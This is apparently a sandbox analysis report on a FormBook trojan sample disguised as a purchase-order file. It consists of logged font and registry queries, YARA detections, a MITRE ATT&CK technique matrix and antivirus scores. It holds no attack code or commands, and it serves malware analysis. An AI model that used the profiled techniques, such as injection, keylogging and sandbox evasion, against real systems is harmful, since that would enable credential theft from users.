          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exe
          Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Masquerading 1 | Input Capture 1 | Security Software Discovery 221 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

          Behavior Graph

          [Figure: behavior graph, ID 383978. Sample: PO-RFQ # 097663899.exe; start date: 08/04/2021; architecture: WINDOWS; score: 100. Process chain shown: PO-RFQ # 097663899.exe (started) -> PO-RFQ # 097663899.exe (started) -> explorer.exe (injected) -> systray.exe (started) -> cmd.exe (started) -> conhost.exe (started).]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label | Link
          PO-RFQ # 097663899.exe | 30% | Virustotal | | Browse
          PO-RFQ # 097663899.exe | 27% | ReversingLabs | Win32.Trojan.Woreflint |
          PO-RFQ # 097663899.exe | 100% | Joe Sandbox ML | |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label | Link | Download
          4.2.PO-RFQ # 097663899.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains


          Contacted URLs


          URLs from Memory and Binaries

                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
